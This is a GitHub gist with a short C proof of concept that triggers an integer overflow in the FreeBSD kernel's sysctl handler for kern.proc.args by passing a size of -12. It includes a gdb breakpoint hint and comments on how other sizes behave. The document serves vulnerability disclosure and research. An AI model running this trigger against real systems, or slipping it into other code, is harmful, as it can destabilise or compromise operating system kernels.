-
-
Save CTurt/89c0544cb4dcc1fb8ce4 to your computer and use it in GitHub Desktop.
PoC for integer overflow in sysctl handler for kern.proc.args
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| PoC for integer overflow in sysctl handler for kern.proc.args: | |
| (no Bugzilla yet) | |
| Set a breakpoint on the call to malloc in pargs_alloc with the size you expect (address below is for FreeBSD 9.0): | |
| (gdb) break *0xFFFFFFFF8082646E if $rdi=11 | |
| clang p.c -o p | |
| ./p | |
| - CTurt | |
| */ | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <errno.h> | |
| #include <dlfcn.h> | |
| #include <sys/types.h> | |
| #include <sys/sysctl.h> | |
| #define ps_arg_cache_limit (0x1000 / 16) | |
| int main(void) { | |
| int result = 0; | |
| errno = 0; | |
| char *buffer = malloc(0x8000); | |
| memset(buffer, 'a', 0x8000); | |
| //size_t size = ps_arg_cache_limit - 12; // Fine | |
| //size_t size = ps_arg_cache_limit - 12 + 1; // ENOMEM | |
| //size_t size = 0xffffffffffffffff; // EFAULT | |
| size_t size = -12; | |
| int name[4]; | |
| name[0] = CTL_KERN; | |
| name[1] = KERN_PROC; | |
| name[2] = KERN_PROC_ARGS; | |
| name[3] = getpid(); | |
| result = sysctl(name, 4, NULL, NULL, buffer, size); | |
| printf("result %d\n", result); | |
| printf("errno %d\n", errno); | |
| free(buffer); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment